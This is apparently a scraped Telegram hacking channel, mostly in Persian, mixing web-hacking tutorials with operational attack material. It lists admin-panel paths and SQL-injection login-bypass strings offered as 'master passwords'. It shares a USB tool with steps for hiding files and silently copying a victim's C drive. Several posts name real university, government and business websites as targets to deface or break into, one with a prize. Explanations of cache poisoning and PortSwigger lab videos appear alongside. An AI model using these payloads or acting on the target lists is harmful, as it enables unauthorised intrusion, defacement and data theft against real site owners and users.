0Day.Today | Learn Exploit | Zero World | Dark web |
Admin panel path for pentest Admin bypass and .... admin/ administrator/ admin1/ admin2/ admin3/ admin4/ admin5/ usuarios/ usuario/ moderator/ webadmin/ adminarea/ bb-admin/ adminLogin/ admin_area/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/…
Master Passwords : you can bypassing admin login pages
With master Passwords!
Fill in the input fields with these.
------------------------------------
' or ''='
') or true—
') or ('')=('
') or 1—
') or ('x')=('
" or true—
" or ""="
" or 1—
'or''='
" or "x"="
") or true—
") or ("")=("
") or 1—
") or ("x")=("
')) or true—
')) or ((''))=(('
')) or 1—
')) or (('x'))=(('
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
With master Passwords!
Fill in the input fields with these.
------------------------------------
' or ''='
') or true—
') or ('')=('
') or 1—
') or ('x')=('
" or true—
" or ""="
" or 1—
'or''='
" or "x"="
") or true—
") or ("")=("
") or 1—
") or ("x")=("
')) or true—
')) or ((''))=(('
')) or 1—
')) or (('x'))=(('
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍6❤1
Media is too big
VIEW IN TELEGRAM
نحوه هک یک دانشگاه با استفاده ابزار web checker
ابن ابزار برای جمع اوری اطلاعات از تارگت شما استفاده میشه
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
@Bvrce
ابن ابزار برای جمع اوری اطلاعات از تارگت شما استفاده میشه
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
@Bvrce
❤8😁3
Forwarded from imem!
کدامیک از روشهای زیر نمیتواند بهعنوان روشی برای جلوگیری از حمله کش دیسپشن (Cache Deception) مورد استفاده قرار گیرد؟
Anonymous Quiz
24%
استفاده از هدرهای HTTP مانند Cache-Control: no-store
26%
تنظیم پروتکل HTTPS و کنترل دقیق هدرهای امنیتی
30%
ذخیرهسازی دادههای حساس در کش مرورگر برای تسریع بارگذاری صفحات
20%
استفاده از Content Security Policy (CSP) برای محدود کردن بارگذاری اسکریپتهای مشکوک
کسی ریاضی مهندسی بلده حل کنه؟
@soltane_sorat
@soltane_sorat
👍1
کش پویزنینگ (Cache Poisoning):
کش پویزنینگ یک نوع حمله به سرورهای وب است که هدف آن تغییر و آلوده کردن محتوای کش (cache) است. در این حمله، یک مهاجم دادههای مخرب را در کش وب سرور قرار میدهد. سپس، زمانی که کاربران به منابع کششده دسترسی پیدا میکنند، دادههای آلوده و مخرب به آنها ارسال میشود. به این ترتیب، کاربران بدون اطلاع از تغییرات، محتوای نادرست یا کدهای مخرب را دریافت میکنند.
این حمله میتواند از طریق unkeyed پارامترها صورت بگیرد. این پارامترها ورودیهایی هستند که در سیستم کش نادیده گرفته میشوند و محتوای مشابهی برای کاربران مختلف تولید میشود. مهاجم با استفاده از این نوع پارامترها میتواند محتوای کششده را دستکاری کند و دادههای مخربی را به کاربران دیگر ارائه دهد.
آنکید (Unkeyed) پارامترها:
پارامترهای "unkeyed" به پارامترهایی اشاره دارند که در فرآیند کش (cache) وب سرور نقشی ندارند و کش به آنها توجه نمیکند. به عنوان مثال، پارامترهایی که در URL یک درخواست وب اضافه میشوند، ولی توسط سیستم کش بهعنوان بخشی از کلید کش (cache key) در نظر گرفته نمیشوند. این باعث میشود که تمامی درخواستها (حتی اگر شامل پارامترهای متفاوتی باشند) به یک منبع کششده ارجاع داده شوند.
مهاجمان میتوانند از این ضعف برای ارسال درخواستهای حاوی پارامترهای مخرب استفاده کنند و باعث شوند که محتوای آلوده به کش ارسال شود و سپس به کاربران بیاطلاع توزیع شود.
هدرهای Unkeyed:
در این نوع حمله، مهاجم تلاش میکند یک هدر Unkeyed پیدا کند که رفلکت شود. هدرهایی که در درخواستهای HTTP به سرور ارسال میشوند، میتوانند در پاسخهای سرور بهطور ناخواسته منعکس (رفلکت) شوند. اگر هدرهای خاصی در محتوای پاسخ یا کلید کش لحاظ نشوند، میتوانند بهعنوان برداری برای حملات رفلکتیو (reflected attacks) مورد سوءاستفاده قرار گیرند.
در این سناریو، مهاجم تلاش میکند تا یک هدر پیدا کند که سرور بدون اینکه آن را رمزنگاری کند یا به عنوان بخشی از کلید کش لحاظ کند، در پاسخ بازگرداند. با این کار، میتوان هدرهای مخرب را بهصورت رفلکتشده به کاربران دیگر ارسال کرد و آسیبپذیریهایی همچون XSS یا Cache Poisoning را اجرا کرد.
اکستنشن Param Miner:
ابزار Param Miner یکی از ابزارهای تست امنیتی در زمینه پیدا کردن پارامترهای آسیبپذیر است. این ابزار بهطور خودکار پارامترهایی را که توسط سیستم کش نادیده گرفته میشوند، کشف میکند. این پارامترها میتوانند در حملات مختلف، از جمله حملات cache poisoning، استفاده شوند. این ابزار بهویژه در سناریوهایی که مهاجمان به دنبال پارامترهای unkeyed هستند، مفید است.
این اکستنشن میتواند درخواستهای مختلفی با پارامترهای تصادفی به سرور ارسال کند و بررسی کند که آیا این پارامترها در فرآیند کش نادیده گرفته میشوند یا خیر. در این صورت، از آنها میتوان برای حملات Cache Poisoning استفاده کرد.
رفلکشن کوکیها (Cookie Reflection):
رفلکشن کوکیها یک آسیبپذیری مهم در امنیت وب است. در این نوع حمله، کوکیهای کاربر توسط سرور بدون تغییر یا اعتبارسنجی مجدد در پاسخ HTTP بازگردانده میشوند. این نوع رفتار میتواند برای اجرای حملات XSS یا Cache Poisoning مورد استفاده قرار گیرد.
بهعنوان مثال، اگر مهاجم بتواند کوکیهای کاربر را بهصورت رفلکتشده در پاسخ سرور قرار دهد و این اطلاعات در کش ذخیره شود، کاربران دیگر نیز میتوانند محتوای آلوده را دریافت کنند. رفلکشن کوکیها اغلب با استفاده از هدرهای HTTP یا پارامترهای URL همراه میشود و میتواند باعث افشای دادههای حساس کاربران یا اجرا شدن کدهای مخرب در مرورگرهای آنها شود.
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
T.me/imexemi
کش پویزنینگ یک نوع حمله به سرورهای وب است که هدف آن تغییر و آلوده کردن محتوای کش (cache) است. در این حمله، یک مهاجم دادههای مخرب را در کش وب سرور قرار میدهد. سپس، زمانی که کاربران به منابع کششده دسترسی پیدا میکنند، دادههای آلوده و مخرب به آنها ارسال میشود. به این ترتیب، کاربران بدون اطلاع از تغییرات، محتوای نادرست یا کدهای مخرب را دریافت میکنند.
این حمله میتواند از طریق unkeyed پارامترها صورت بگیرد. این پارامترها ورودیهایی هستند که در سیستم کش نادیده گرفته میشوند و محتوای مشابهی برای کاربران مختلف تولید میشود. مهاجم با استفاده از این نوع پارامترها میتواند محتوای کششده را دستکاری کند و دادههای مخربی را به کاربران دیگر ارائه دهد.
آنکید (Unkeyed) پارامترها:
پارامترهای "unkeyed" به پارامترهایی اشاره دارند که در فرآیند کش (cache) وب سرور نقشی ندارند و کش به آنها توجه نمیکند. به عنوان مثال، پارامترهایی که در URL یک درخواست وب اضافه میشوند، ولی توسط سیستم کش بهعنوان بخشی از کلید کش (cache key) در نظر گرفته نمیشوند. این باعث میشود که تمامی درخواستها (حتی اگر شامل پارامترهای متفاوتی باشند) به یک منبع کششده ارجاع داده شوند.
مهاجمان میتوانند از این ضعف برای ارسال درخواستهای حاوی پارامترهای مخرب استفاده کنند و باعث شوند که محتوای آلوده به کش ارسال شود و سپس به کاربران بیاطلاع توزیع شود.
هدرهای Unkeyed:
در این نوع حمله، مهاجم تلاش میکند یک هدر Unkeyed پیدا کند که رفلکت شود. هدرهایی که در درخواستهای HTTP به سرور ارسال میشوند، میتوانند در پاسخهای سرور بهطور ناخواسته منعکس (رفلکت) شوند. اگر هدرهای خاصی در محتوای پاسخ یا کلید کش لحاظ نشوند، میتوانند بهعنوان برداری برای حملات رفلکتیو (reflected attacks) مورد سوءاستفاده قرار گیرند.
در این سناریو، مهاجم تلاش میکند تا یک هدر پیدا کند که سرور بدون اینکه آن را رمزنگاری کند یا به عنوان بخشی از کلید کش لحاظ کند، در پاسخ بازگرداند. با این کار، میتوان هدرهای مخرب را بهصورت رفلکتشده به کاربران دیگر ارسال کرد و آسیبپذیریهایی همچون XSS یا Cache Poisoning را اجرا کرد.
اکستنشن Param Miner:
ابزار Param Miner یکی از ابزارهای تست امنیتی در زمینه پیدا کردن پارامترهای آسیبپذیر است. این ابزار بهطور خودکار پارامترهایی را که توسط سیستم کش نادیده گرفته میشوند، کشف میکند. این پارامترها میتوانند در حملات مختلف، از جمله حملات cache poisoning، استفاده شوند. این ابزار بهویژه در سناریوهایی که مهاجمان به دنبال پارامترهای unkeyed هستند، مفید است.
این اکستنشن میتواند درخواستهای مختلفی با پارامترهای تصادفی به سرور ارسال کند و بررسی کند که آیا این پارامترها در فرآیند کش نادیده گرفته میشوند یا خیر. در این صورت، از آنها میتوان برای حملات Cache Poisoning استفاده کرد.
رفلکشن کوکیها (Cookie Reflection):
رفلکشن کوکیها یک آسیبپذیری مهم در امنیت وب است. در این نوع حمله، کوکیهای کاربر توسط سرور بدون تغییر یا اعتبارسنجی مجدد در پاسخ HTTP بازگردانده میشوند. این نوع رفتار میتواند برای اجرای حملات XSS یا Cache Poisoning مورد استفاده قرار گیرد.
بهعنوان مثال، اگر مهاجم بتواند کوکیهای کاربر را بهصورت رفلکتشده در پاسخ سرور قرار دهد و این اطلاعات در کش ذخیره شود، کاربران دیگر نیز میتوانند محتوای آلوده را دریافت کنند. رفلکشن کوکیها اغلب با استفاده از هدرهای HTTP یا پارامترهای URL همراه میشود و میتواند باعث افشای دادههای حساس کاربران یا اجرا شدن کدهای مخرب در مرورگرهای آنها شود.
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
T.me/imexemi
❤🔥6👍3👏1
Forwarded from imem!
USB-Copyer.rar
686 B
ابزاری برای کپی درایو C تارگت در USB
Join => @imexemi
- تمامی فایل هارو داخل فلش بریزید.
- داخل usb تون یک ترمینال باز کنید و دستور زیر رو وارد کنید:
attrib +H copy.bat & attrib +H invisible.vbs
- با این دستور دوتا فایل رو هیدن کردید
و فقط یه فایل start.bat مونده.
- فقط کافیه USB رو به سیستم قربانی بزنید و فایل start.bat رو ران کنید.
Password => @imexemi
Join => @imexemi
❤3
Media is too big
VIEW IN TELEGRAM
جمع آوری اطلاعات - جمع آوری سایت های روی سرور همان ریورس که در ویدیو بالا تر دیدین اما با ابزار revers.py برای اینکه سریع تر تارگت هارو جمع اوردی کنید
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍5🆒1
reverseip.py
2.9 KB
❤5❤🔥1
Forwarded from imem!
This media is not supported in your browser
VIEW IN TELEGRAM
حل چلنج پورت سوییگر
قسمت اول، لینک ویدیو
قصد داریم تا همهی لابراتورهای پورت سوییگر رو حل کنیم. اگه نظر یا پیشنهادی دارید، حتما با ما در میون بزاریدش.
حمایت شما باعث دلگرمیه🔥
Join => @imexemi
reflected xss into html context with nothing encoded
قسمت اول، لینک ویدیو
قصد داریم تا همهی لابراتورهای پورت سوییگر رو حل کنیم. اگه نظر یا پیشنهادی دارید، حتما با ما در میون بزاریدش.
حمایت شما باعث دلگرمیه🔥
Join => @imexemi
❤🔥4👍1
Forwarded from Cyber Lab (KurtLar)
Media is too big
VIEW IN TELEGRAM
هک دوربین های مداربسته قسمت اول
مدرس ایپی ها کوروش سنایی و مدرس تست نفوذ دوربین های مداربسته @Bvrce
t.me/KurtLar0101
مدرس ایپی ها کوروش سنایی و مدرس تست نفوذ دوربین های مداربسته @Bvrce
t.me/KurtLar0101
👍2
Forwarded from Cyber Lab (KurtLar)
Media is too big
VIEW IN TELEGRAM
هک دوربین های مداربسته قسمت دوم
مدرس ایپی ها کوروش سنایی و مدرس تست نفوذ دوربین های مداربسته @Bvrce
t.me/KurtLar0101
مدرس ایپی ها کوروش سنایی و مدرس تست نفوذ دوربین های مداربسته @Bvrce
t.me/KurtLar0101
😁4
یه وبسایت درجه3 برای تمرین و تارگتکردن
https://inc.kmutt.ac.th/home
سایتش خیلی داغونه و حتی بدون هیچ انکودینگی xss میخوره.
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
T.me/imexemi
👍1
یک تارگتی براتون میزارم شما باید سایت رو هک کنید و تایتل سایت که هستش try Hack me رو به I hacked تغییر بدین و برام بفرستین و جایزه بگیرین
تارگت : https://snimidomik.ru
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
تارگت : https://snimidomik.ru
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
Снимидомик.ру
Снимидомик.ру - посуточная аренда домов в г. Красноярск
👍3❤1
Forwarded from Cyber Lab (KurtLar)
Try Hack Me
https://www.eapus.pn-sinabang.go.id
یک عکس روی تارگت بالا آپلود نمایید با پسوند .jpg
از پنل ادمین اقدام نمایید
جمع آوری اطلاعات به شما کمک میکند
تارگت برای وب هکینگ
Join : t.me/KurtLar0101
https://www.eapus.pn-sinabang.go.id
یک عکس روی تارگت بالا آپلود نمایید با پسوند .jpg
از پنل ادمین اقدام نمایید
جمع آوری اطلاعات به شما کمک میکند
تارگت برای وب هکینگ
Join : t.me/KurtLar0101
0Day.Today | Learn Exploit | Zero World | Dark web |
http://chatrooms.000.pe/ یه چتروم وابسته به فایل تکست😂 پ.ن: بهتر میشه
فقط یه xss ساده بود
این چه کاریه آخه
این چه کاریه آخه
😁6
Cyber Lab (KurtLar)
Try Hack Me https://www.eapus.pn-sinabang.go.id یک عکس روی تارگت بالا آپلود نمایید با پسوند .jpg از پنل ادمین اقدام نمایید جمع آوری اطلاعات به شما کمک میکند تارگت برای وب هکینگ Join : t.me/KurtLar0101
https://bekotas.com.tr/
وارد پنل ادمین تارگت بالا بشین 👆👆
تارگت برای وب هکینگ
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
وارد پنل ادمین تارگت بالا بشین 👆👆
تارگت برای وب هکینگ
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today